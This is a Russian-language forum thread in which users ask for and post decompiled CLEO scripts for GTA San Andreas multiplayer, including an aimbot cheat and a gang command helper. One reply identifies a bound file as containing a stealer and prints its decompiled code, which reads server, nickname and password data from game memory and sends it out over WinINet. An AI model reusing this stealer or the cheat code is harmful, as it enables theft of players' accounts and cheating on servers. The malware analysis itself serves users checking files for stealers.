Декомпиляция скриптов

FYP

Известный
Автор темы
Администратор
1,757
5,684
GVWUrNJ.png
eNo5cSj.png


Общая тема для просьб о помощи в декомпиляциии и декриптованиии скриптов, плагинов и приложений.
Запрещено просить о декомпиляции/декриптовании софта, выставленного на продажу на нашем сайте.

Рекомендации:
  1. Сначала воспользуйтесь поиском по теме и по форуму, возможно его в декомпилированном виде или с исходным кодом уже выкладывали у нас на сайте.
  2. Попытайтесь декомпилировать самостоятельно: CLEO - декриптор, декомпилятор; AHK - распаковщик .exe; LuaJIT - декомпилятор1, декомпилятор2.
  3. Просить о декомпиляции .asi, .sf, .dll, .exe почти бесполезно, часто такие просьбы остаются без ответа и вряд ли вам это что-то даст. Можете попробовать сами, IDA Pro или Ghidra к вашим услугам.
    • Это не касается .exe, которые являются скомпилированными AutoHotKey-скриптами (.ahk).
  4. Добавьте название скрипта к сообщению, если оно известно - это поможет другим пользователям найти его с помощью поиска.
  5. Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и скорее всего будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.
 
Последнее редактирование:

asdzxcjqwe

¯\_(ツ)_/¯
Друг
621
704
Пожалуйста, декрипт.
все самоизвлекающиеся трояны

Декриптаните пж.
не закриптован, установи sampfuncs посл. версии

Буду признателен
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP 
0B34: samp register_client_command "igrove" to_label @Label000642 
0B34: samp register_client_command "ivagos" to_label @Label000694 
0B34: samp register_client_command "iballas" to_label @Label0006E4 
0B34: samp register_client_command "iaztec" to_label @Label000787 
0B34: samp register_client_command "irifa" to_label @Label000735 
0B34: samp register_client_command "iyakuza" to_label @Label0007D6 
0B34: samp register_client_command "ilcn" to_label @Label000828 
0B34: samp register_client_command "irm" to_label @Label000876 
0B34: samp register_client_command "ioff" to_label @Label0008C9 

:Label000083
wait 0 
if and
   not SAMP.ChatInputOpened
   not SAMP.IsDialogActive(-1)
key_down 20 
jf @Label000168 
if 
  31@ == 0 
jf @Label00010E 
printf "~w~ Aim ~g~ on ~w~ dev. butchers perfect-soft.net" 1500 
018C: play_sound 1083 at 0.0 0.0 0.0 
31@ = 1 
wait 200 
goto @Label000168 

:Label00010E
printf "~w~ Aim ~r~ off ~w~ dev. butchers perfect-soft.net" 1500 
018C: play_sound 1058 at 0.0 0.0 0.0 
31@ = 0 
wait 200 

:Label000168
goto @Label00016F 

:Label00016F
wait 0 
if and
  31@ == 1 
0AD2: 2@ = player $PLAYER_CHAR targeted_actor //IF and SET 
jf @Label000083 

:Label00018D
wait 0 
if and
056D:   actor 2@ defined 
key_down 1 
jf @Label000083 
0665: get_actor 2@ model_to 22@ 
if and
   not Actor.Dead(2@)
02CB:   actor 2@ bounding_sphere_visible 
803B:   not  22@ == 23@ // (int) 
803B:   not  22@ == 24@ // (int) 
803B:   not  22@ == 25@ // (int) 
803B:   not  22@ == 26@ // (int) 
803B:   not  22@ == 27@ // (int) 
803B:   not  22@ == 28@ // (int) 
jf @Label000083 
0A96: 6@ = actor 2@ struct 
6@ += 68 
0A8D: 3@ = read_memory 6@ size 4 virtual_protect 0 
6@ += 4 
0A8D: 4@ = read_memory 6@ size 4 virtual_protect 0 
6@ += 4 
0A8D: 5@ = read_memory 6@ size 4 virtual_protect 0 
Actor.StorePos(2@, 6@, 7@, 8@)
10@ = 35 
0093: 10@ = integer 10@ to_float 
12@ = 17.0 
12@ /= 360.0 
006B: 3@ *= 12@ // (float) 
006B: 4@ *= 12@ // (float) 
006B: 5@ *= 12@ // (float) 
006B: 3@ *= 10@ // (float) 
006B: 4@ *= 10@ // (float) 
006B: 5@ *= 10@ // (float) 
005B: 6@ += 3@ // (float) 
005B: 7@ += 4@ // (float) 
005B: 8@ += 5@ // (float) 
Actor.StorePos($PLAYER_ACTOR, 3@, 4@, 5@)
if 
06BD:   no_obstacles_between 3@ 4@ 5@ and 6@ 7@ 8@ solid 1 car 1 actor 0 object 1 particle 0 
jf @Label0002F9 
call @Label000300 4 2@ 6@ 7@ 8@ 

:Label0002F9
goto @Label00018D 

:Label000300
0087: 4@ = 1@ // (float) 
0087: 5@ = 2@ // (float) 
0087: 6@ = 3@ // (float) 
068D: get_camera_position_to 1@ 2@ 3@ 
04C4: store_coords_to 7@ 8@ 9@ from_actor $PLAYER_ACTOR with_offset 0.0 0.0 0.0 
0063: 1@ -= 4@ // (float) 
0063: 2@ -= 5@ // (float) 
0096: make 1@ absolute_float 
0096: make 2@ absolute_float 
0087: 10@ = 1@ // (float) 
0087: 11@ = 2@ // (float) 
006B: 10@ *= 10@ // (float) 
006B: 11@ *= 11@ // (float) 
005B: 10@ += 11@ // (float) 
01FB: 10@ = square_root 10@ 
0087: 11@ = 1@ // (float) 
0087: 12@ = 10@ // (float) 
0073: 11@ /= 12@ // (float) 
0AA5: call 4327328 num_params 1 pop 1 11@  
0AE9: pop_float 12@ 
0AA5: call 4775488 num_params 1 pop 1 11@  
0AE9: pop_float 13@ 
if 
call @Label0005DE 0 16@ 
jf @Label000427 
if 
call @Label00042C 7 4@ 5@ 7@ 8@ 12@ 13@ 16@ 15@ 
jf @Label000427 
15@ += 0.0389 
0A8C: write_memory 11989592 size 4 value 15@ virtual_protect 0 

:Label000427
ret 0 

:Label00042C
if 
  6@ == 5 
jf @Label00046D 
7@ = 0.01 
8@ = 0.01 
9@ = 1.5607 
10@ = 1.5807 
goto @Label0004D6 

:Label00046D
if 
  6@ == 6 
jf @Label0004AE 
7@ = 0.018 
8@ = 0.02 
9@ = 1.5507 
10@ = 1.5907 
goto @Label0004D6 

:Label0004AE
7@ = 0.0 
8@ = 0.0 
9@ = 1.5707 
10@ = 1.5707 

:Label0004D6
if and
0025:   2@ > 0@ // (float) 
0025:   3@ > 1@ // (float) 
jf @Label000501 
0063: 5@ -= 8@ // (float) 
0087: 15@ = 5@ // (float) 

:Label000501
if and
0025:   2@ > 0@ // (float) 
8035:   not  3@ >= 1@ // (float) 
jf @Label000536 
5@ *= -1.0 
0063: 5@ -= 7@ // (float) 
0087: 15@ = 5@ // (float) 

:Label000536
if and
8035:   not  2@ >= 0@ // (float) 
0025:   3@ > 1@ // (float) 
jf @Label000561 
005B: 4@ += 9@ // (float) 
0087: 15@ = 4@ // (float) 

:Label000561
if and
8035:   not  2@ >= 0@ // (float) 
8035:   not  3@ >= 1@ // (float) 
jf @Label000596 
4@ *= -1.0 
0063: 4@ -= 10@ // (float) 
0087: 15@ = 4@ // (float) 

:Label000596
0A8D: 11@ = read_memory 11989592 size 4 virtual_protect 0 
0063: 11@ -= 15@ // (float) 
if and
   not 11@ >= 0.18 
  11@ > -0.18 
jf @Label0005D4 
return_true 
goto @Label0005D6 

:Label0005D4
return_false 

:Label0005D6
ret 1 15@ 

:Label0005DE
0A96: 0@ = actor $PLAYER_ACTOR struct 
0@ += 1816 
0A8D: 1@ = read_memory 0@ size 1 virtual_protect 0 
if or
  1@ == 2 
  1@ == 3 
  1@ == 4 
  1@ == 5 
  1@ == 6 
  1@ == 7 
jf @Label000638 
return_true 
goto @Label00063A 

:Label000638
return_false 

:Label00063A
ret 1 1@ 

:Label000642
23@ = 105 
24@ = 106 
25@ = 107 
26@ = 270 
27@ = 271 
28@ = 269 
29@ = 56 
printf "~w~ Ignore ~r~ grove" 1500 
SAMP.CmdRet

:Label000694
23@ = 108 
24@ = 109 
25@ = 110 
26@ = 190 
27@ = -1 
28@ = -1 
29@ = -1 
printf "~w~ Ignore ~r~ vagos" 1500 
SAMP.CmdRet

:Label0006E4
23@ = 102 
24@ = 103 
25@ = 104 
26@ = 195 
27@ = -1 
28@ = -1 
29@ = -1 
printf "~w~ Ignore ~r~ ballas" 1500 
SAMP.CmdRet

:Label000735
23@ = 173 
24@ = 174 
25@ = 175 
26@ = 226 
27@ = -1 
28@ = -1 
29@ = -1 
printf "~w~ Ignore ~r~ rifa" 1500 
SAMP.CmdRet

:Label000787
23@ = 114 
24@ = 115 
25@ = 116 
26@ = 41 
27@ = -1 
28@ = -1 
29@ = -1 
printf "~w~ Ignore ~r~ aztec" 1500 
SAMP.CmdRet

:Label0007D6
23@ = 123 
24@ = 117 
25@ = 117 
26@ = 120 
27@ = 169 
28@ = 186 
29@ = -1 
printf "~w~ Ignore ~ê~ yakuza" 1500 
SAMP.CmdRet

:Label000828
23@ = 124 
24@ = 113 
25@ = 223 
26@ = 91 
27@ = -1 
28@ = -1 
29@ = -1 
printf "~w~ Ignore ~r~ lcn" 1500 
SAMP.CmdRet

:Label000876
23@ = 111 
24@ = 112 
25@ = 125 
26@ = 214 
27@ = 272 
28@ = -1 
29@ = -1 
printf "~w~ Ignore ~r~ russian" 1500 
SAMP.CmdRet

:Label0008C9
23@ = -1 
24@ = -1 
25@ = -1 
26@ = -1 
27@ = -1 
28@ = -1 
29@ = -1 
printf "~w~ Ignore ~r~ off" 1500 
SAMP.CmdRet
 

asdzxcjqwe

¯\_(ツ)_/¯
Друг
621
704
хз,часть кода скрыта,кидани код пжлста
это строки

xSQoOrr.png


Код:
{F3D230}/de {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - DesertEagle.{F3D230}/sd {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - Silenced Pistol.{F3D230}/ri {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - Rifle.{F3D230}/sh {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - Shotgun.{F3D230}/sm {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - SMG.{F3D230}/ak {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - AK47.{F3D230}/m4 {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}патронов - M4.{F3D230}/gg {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}материалов - Взять материалы со склада.{F3D230}/gd {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}наркотиков - Купить наркотики в притоне.{F3D230}/us {FFFFFF}- {FF5F5F}[Кол-ч] {FFFFFF}наркотиков - Употребить наркотики.{F3D230}/iv {FFFFFF}- {FF5F5F}[ID] {FFFFFF}игрока - Принять игрока в банду.{F3D230}/uv {FFFFFF}- {FF5F5F}[ID] {FFFFFF}игрока - Уволить игрока.{F3D230}/gr {FFFFFF}- {FF5F5F}[ID] {FFFFFF}игрока {FF5F5F}[Ранг] {FFFFFF}- Повысить/Понизить игрока.{F3D230}/cl {FFFFFF}- Выключить клист.{F3D230}/mg {FFFFFF}- Взять ящик с боеприпасами LVA/LSA.{F3D230}/mp {FFFFFF}- Положить ящик с боеприпасами в фургон.{F3D230}/hl {FFFFFF}- Использовать аптечку.{F3D230}/un {FFFFFF}- Разгрузить фургон на склад банды.{F3D230}/wa {FFFFFF}- Проверить кол-ч боеприпасов на складе банды.{F3D230}/mb {FFFFFF}- Проверить кол-ч игроков онлайн в банде.{F3D230}/sp {FFFFFF}- Сменить место спавна (Дом, квартира, респа).ш..]{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/de {FF5F5F}[кол-ч] {FFFFFF}патронов.я.C.ш.._{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/us {FF5F5F}[кол-ч] {FFFFFF}наркотиков.я.C.ш.._{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/gg {FF5F5F}[кол-ч] {FFFFFF}материалов.я.C.ш.._{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/gd {FF5F5F}[кол-ч] {FFFFFF}наркотиков.я.C.ш..X{FFFFFF}Неверный формат команды: {FF5F5F}Пример: {FFFFFF}/iv {FF5F5F}[ID] {FFFFFF}игрока.я.C.

software - HxD (ctrl+n > ctrl+v > press OK)
original - https://i.imgur.com/xSQoOrr.png
 

FSFFGSF

Новичок
28
0
Декомпил пж код якобы для GTA3 Но не открывает
На самом деле код для са и если сможете открыть если не сложно напишите как в лс
 

Вложения

  • fray.cs
    37.2 KB · Просмотры: 15

asdzxcjqwe

¯\_(ツ)_/¯
Друг
621
704
Декомпил пж код якобы для GTA3 Но не открывает
На самом деле код для са и если сможете открыть если не сложно напишите как в лс
файл коннектором склеен, тут два скрипта, первый - стилер, второй - ниже
CLEO:
{$CLEO .cs}
0000: NOP
repeat
wait 400
until SAMP.Available
0B34: samp register_client_command "cbug" to_label @Cmd
0B34: samp register_client_command "cbugwait" to_label @wait
10@ == 0

while true
wait 10@
0470: 3@ = actor $PLAYER_ACTOR current_weapon
if and
02E0:   actor $PLAYER_ACTOR firing_weapon
31@ == 1
    then
    if and
    3@ >= 23
    3@ <= 25
        then jump @work
        end
    if or
    3@ == 33
    3@ == 34
        then jump @work
        end
    end
continue
:work
01B2: give_actor $PLAYER_ACTOR weapon 3@ ammo 0 // Load the weapon model before using this
Actor.StorePos($PLAYER_ACTOR, 0@, 1@, 2@)
2@ += -1.0
Actor.PutAt($PLAYER_ACTOR, 0@, 1@, 2@)
end

:Cmd
0B12: 31@ = 31@ XOR 1
SAMP.CmdRet

:wait
0B35: samp 8@ = get_last_command_params
0AD4: 9@ = scan_string 8@ format "%d" 10@
samp.CmdRet()

начало
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0AC6: 0@ = label @Label00499C offset // по этому адресу код стилера (первый скрипт)
alloc 1@ 224
0AA6: call_method 4606176 struct 1@ num_params 0 pop 0
0A8E: 2@ = 1@ + 16 // int
0A8C: write_memory 2@ size 4 value 0@ virtual_protect 1
0A8E: 2@ = 1@ + 20 // int
0A8C: write_memory 2@ size 4 value 0@ virtual_protect 1
0A8E: 2@ = 1@ + 196 // int
0A8C: write_memory 2@ size 1 value 1 virtual_protect 1
0AA6: call_method 4606976 struct 1@ num_params 1 pop 0 11056172
0AC6: 0@ = label @Label0000B2 offset // по этому адресу второй скрипт
0A9F: 1@ = current_thread_pointer
0A8E: 2@ = 1@ + 16 // int
0A8C: write_memory 2@ size 4 value 0@ virtual_protect 1
0A8E: 2@ = 1@ + 20 // int
0A8C: write_memory 2@ size 4 value 0@ virtual_protect 1

:Label0000B2
0000: NOP
wait 400
   SAMP.Available
else_jump @Label000002
0B34: samp register_client_command "cbug" to_label @Label0000D7
0B34: samp register_client_command "cbugwait" to_label @Label0000E3
  10@ == 0
wait 10@
0470: 3@ = actor $PLAYER_ACTOR current_weapon
if and
02E0:   actor $PLAYER_ACTOR firing_weapon
  31@ == 1
else_jump @Label000099
if and
  3@ >= 23
   not 3@ > 25
else_jump @Label000079
jump @Label0000A0
if or
  3@ == 33
  3@ == 34
else_jump @Label000099
jump @Label0000A0
jump @Label0000D0
Actor.GiveWeaponAndAmmo($PLAYER_ACTOR, 3@, 0)
Actor.StorePos($PLAYER_ACTOR, 0@, 1@, 2@)
2@ += -1.0
Actor.PutAt($PLAYER_ACTOR, 0@, 1@, 2@)
jump @Label000035
0B12: 31@ = 31@ XOR 1
SAMP.CmdRet
   SAMP.IsCommandTyped(8@)
0AD4: 9@ = scan_string 8@ format "%d" 10@
SAMP.CmdRet

0x499C
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
wait 0
call @Label0005C9 0
call @Label00053D 1 -38
goto @Label00068A

:Label000026
wait 0
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0A8E: 3@ = 0@ + 2203896 // int
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1
if
  2@ > 1000
jf @Label0003AF
0A8E: 22@ = 2@ + 973 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1
if
  2@ > 1000
jf @Label0003AF
0A8E: 5@ = 23@ + 24 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1
if
  4@ > 1000
jf @Label0003AF
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1
if
  24@ > 1000
jf @Label0003AF
0A8E: 22@ = 0@ + 2203832 // int
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1
if
  1@ > 1000
jf @Label0003AF
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1
if
  6@ == 1
jf @Label0001A0
if or
  26@ == 1
  26@ == 3
jf @Label0001A0
25@ = 1

:Label0001A0
if and
  25@ == 1
   not 6@ == 1
jf @Label0003AF
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 6@ = 0@ + 528432 // int
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 7@ = 4@ + 10 // int
if
   not 23@ >= 16
jf @Label000243
0085: 12@ = 7@ // (int)
goto @Label00024F

:Label000243
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1

:Label00024F
wait 100
0A8E: 9@ = 2@ + 289 // int
0A8E: 14@ = 2@ + 32 // int
0A8E: 8@ = 2@ + 549 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1
21@ = Player.Money($PLAYER_CHAR)
0AC6: 0@ = label @Label000665 offset
call @Label0003B6 0 22@ 4@ 25@ 6@ 7@ 8@ 19@ 10@
alloc 20@ 1024
gosub @Label000680
alloc 20@ 456
format 20@ "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%02d&time=%02d:%d&data=%02d.%02d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@
alloc 8@ 356
format 8@ ""
call @Label0004A8 1 8@ 9@
call @Label0004F1 2 9@ 20@
free 8@
free 20@
25@ = 0

:Label0003AF
goto @Label000026

:Label0003B6
0AA2: 0@ = load_library "kernel32.dll" // IF and SET
0AA4: 1@ = get_proc_address "GetLocalTime" library 0@ // IF and SET
alloc 2@ 32
0AA5: call 1@ num_params 1 pop 0 2@
0A8D: 3@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 4@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 5@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 6@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 7@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 8@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 9@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 10@ = read_memory 2@ size 2 virtual_protect 0
2@ -= 30
ret 8 22@ 4@ 25@ 6@ 7@ 8@ 9@ 10@

:Label0004A8
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 5 pop 0 0 0 0 0 0@ 1@
ret 1 1@

:Label0004F1
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 6 pop 0 0 0 0 0 1@ 0@ 2@
ret 0

:Label00053D
0A9F: 32@ = current_thread_pointer
32@ += 16
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@ // (int)
0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@
005A: 32@ += 0@ // (int)
33@ += 16
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
33@ += 44
32@ = 0

:Label000598
0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
33@ += 4
32@ += 1
  32@ > 30
jf @Label000598
ret 0

:Label0005C9
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0@ += 371500
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
0@ += 9
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
ret 0
 
Последнее редактирование:
  • Нравится
Реакции: FSFFGSF

FSFFGSF

Новичок
28
0
Декомпил пж репа и лайк с меня заранее спс
 

Вложения

  • fpay.cs
    17.8 KB · Просмотры: 12

LaRossa

Потрачен
429
117
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Держи
 

Вложения

  • fpay.cs.noScrape.txt
    1.9 KB · Просмотры: 28
  • Нравится
Реакции: FSFFGSF

asdzxcjqwe

¯\_(ツ)_/¯
Друг
621
704
Декомпил пожалуйста, санни билдер, тула для декрипта - не вывозит. Цель - проверить на стиллер. Заранее спасибо.
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP 
1@ = 1 

:Label000009
if
   not SAMP.Available
jf @Label00001E 
wait 400 
goto @Label000009 

:Label00001E
wait 1000 
chatmsg "{A3E900}[Kolokol]: {FFFFFF}Успешно загружен. Автор: {A3E900}Niko" -1 
chatmsg "{A3E900}[Kolokol]: {FFFFFF}Специально для сайта: {A3E900}samods.ru" -1 
0@ = Audiostream.Load("CLEO\Kolokol.mp3")
0B34: samp register_client_command "kolokol" to_label @Label0000EC 
0BE1: raknet setup_outcoming_rpc_hook @Label000164 

:Label0000E1
wait 0 
goto @Label0000E1 

:Label0000EC
0B12: 1@ = 1@ XOR 1 
if 
  1@ == 1 
jf @Label000138 
chatmsg "{A3E900}[Kolokol]: {FFFFFF}Включен" -1 
goto @Label000162 

:Label000138
chatmsg "{A3E900}[Kolokol]: {FFFFFF}Выключен" -1 

:Label000162
SAMP.CmdRet

:Label000164
if 
  1@ == 1 
jf @Label0001B9 
0BE5: raknet 2@ = get_hook_param 1 
if 
  2@ == 115 
jf @Label0001B9 
0BE5: raknet 3@ = get_hook_param 0 
4@ = BitStream.Read(3@, 1)
if 
  4@ == 0 
jf @Label0001B9 
Audiostream.PerformAction(0@, PLAY)

:Label0001B9
0BE0: raknet hook_ret 1
 

asdzxcjqwe

¯\_(ツ)_/¯
Друг
621
704
Будьте добры декомпил, заранее благодарствую.
Код открыт
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: nop
0662: printstring "Script by Ded_Fedot"

:Label000019
wait 400
   SAMP.Available
else_jump @Label000019
chatmsg "Cleo {64E6FF}fastgung.cs {FFFFFF}by {FF5F5F}Ded_Fedot" -1
chatmsg "Special for {E53838}Prime-Hack.net {FFFFFF}and {00A2FF}BlastHack.net" -1
chatmsg "Help commands {FFF487}/info" -1
0B34: samp register_client_command "info" to_label @Label000588
0B34: samp register_client_command "de" to_label @Label0001D7
0B34: samp register_client_command "sd" to_label @Label00021B
0B34: samp register_client_command "ri" to_label @Label000261
0B34: samp register_client_command "sh" to_label @Label0002A4
0B34: samp register_client_command "sm" to_label @Label0002E9
0B34: samp register_client_command "ak" to_label @Label00032A
0B34: samp register_client_command "m4" to_label @Label00036C
0B34: samp register_client_command "gg" to_label @Label0003AC
0B34: samp register_client_command "gd" to_label @Label0003E2
0B34: samp register_client_command "us" to_label @Label000419
0B34: samp register_client_command "iv" to_label @Label00044F
0B34: samp register_client_command "uv" to_label @Label000483
0B34: samp register_client_command "gr" to_label @Label0004BB
0B34: samp register_client_command "cl" to_label @Label0004FD
0B34: samp register_client_command "mg" to_label @Label00050C
0B34: samp register_client_command "mp" to_label @Label000521
0B34: samp register_client_command "hl" to_label @Label000536
0B34: samp register_client_command "un" to_label @Label000564
0B34: samp register_client_command "wa" to_label @Label000553
0B34: samp register_client_command "mb" to_label @Label000544
0B34: samp register_client_command "sp" to_label @Label000575

:Label0001C4
wait 0
2@ = SAMP.GetSAMPPlayerIDByActorHandle($PLAYER_ACTOR)
jump @Label0001C4

:Label0001D7
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000B35
say "/sellgun deagle %d 4 %d" 1@ 2@
SAMP.CmdRet

:Label00021B
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000B35
say "/sellgun sdpistol %d 4 %d" 1@ 2@
SAMP.CmdRet

:Label000261
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000B35
say "/sellgun rifle %d 4 %d" 1@ 2@
SAMP.CmdRet

:Label0002A4
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000B35
say "/sellgun shotgun %d 4 %d" 1@ 2@
SAMP.CmdRet

:Label0002E9
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000B35
say "/sellgun smg %d 4 %d" 1@ 2@
SAMP.CmdRet

:Label00032A
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000B35
say "/sellgun ak47 %d 4 %d" 1@ 2@
SAMP.CmdRet

:Label00036C
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000B35
say "/sellgun m4 %d 4 %d" 1@ 2@
SAMP.CmdRet

:Label0003AC
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000C03
say "/get guns %d" 1@
SAMP.CmdRet

:Label0003E2
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000C6B
say "/get drugs %d" 1@
SAMP.CmdRet

:Label000419
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 1@
else_jump @Label000B9B
say "/usedrugs %d" 1@
SAMP.CmdRet

:Label00044F
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 2@
else_jump @Label000CD3
say "/invite %d" 2@
SAMP.CmdRet

:Label000483
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d" 2@
else_jump @Label000D34
say "/uninvite %d 1" 2@
SAMP.CmdRet

:Label0004BB
   SAMP.IsCommandTyped(0@)
if
0AD4: 0@ = scan_string 0@ format "%d %d" 2@ 1@
else_jump @Label000D95
say "/giverank %d %d" 2@ 1@
SAMP.CmdRet

:Label0004FD
say "/clist 0"
SAMP.CmdRet

:Label00050C
say "/materials get"
SAMP.CmdRet

:Label000521
say "/materials put"
SAMP.CmdRet

:Label000536
say "/healme"
SAMP.CmdRet

:Label000544
say "/members"
SAMP.CmdRet

:Label000553
say "/warehouse"
SAMP.CmdRet

:Label000564
say "/unloading"
SAMP.CmdRet

:Label000575
say "/spawnchange"
SAMP.CmdRet

:Label000588
0AC6: 6@ = label @Label0005C6 offset
SAMP.ShowDialog(17, "{FFFFFF}Обзор команд", 6@, "{FFFFFF}Закрыть", "", DIALOG_STYLE_MSGBOX)
SAMP.CmdRet

:Label0005C6
hex
 7B 46 33 44 32 33 30 7D 2F 64 65 20 7B 46 46 46
 46 46 46 7D 2D 20 7B 46 46 35 46 35 46 7D 5B CA
 EE EB 2D F7 5D 20 7B 46 46 46 46 46 46 7D EF E0
 F2 F0 EE ED EE E2 20 2D 20 44 65 73 65 72 74 45
 61 67 6C 65 0A 7B 46 33 44 32 33 30 7D 2F 73 64
 20 7B 46 46 46 46 46 46 7D 2D 20 7B 46 46 35 46
 35 46 7D 5B CA EE EB 2D F7 5D 20 7B 46 46 46 46
 46 46 7D EF E0 F2 F0 EE ED EE E2 20 2D 20 53 69
 6C 65 6E 63 65 64 20 50 69 73 74 6F 6C 0A 7B 46
 33 44 32 33 30 7D 2F 72 69 20 7B 46 46 46 46 46
 46 7D 2D 20 7B 46 46 35 46 35 46 7D 5B CA EE EB
 2D F7 5D 20 7B 46 46 46 46 46 46 7D EF E0 F2 F0
 EE ED EE E2 20 2D 20 52 69 66 6C 65 0A 7B 46 33
 44 32 33 30 7D 2F 73 68 20 7B 46 46 46 46 46 46
 7D 2D 20 7B 46 46 35 46 35 46 7D 5B CA EE EB 2D
 F7 5D 20 7B 46 46 46 46 46 46 7D EF E0 F2 F0 EE
 ED EE E2 20 2D 20 53 68 6F 74 67 75 6E 0A 7B 46
 33 44 32 33 30 7D 2F 73 6D 20 7B 46 46 46 46 46
 46 7D 2D 20 7B 46 46 35 46 35 46 7D 5B CA EE EB
 2D F7 5D 20 7B 46 46 46 46 46 46 7D EF E0 F2 F0
 EE ED EE E2 20 2D 20 53 4D 47 0A 7B 46 33 44 32
 33 30 7D 2F 61 6B 20 7B 46 46 46 46 46 46 7D 2D
 20 7B 46 46 35 46 35 46 7D 5B CA EE EB 2D F7 5D
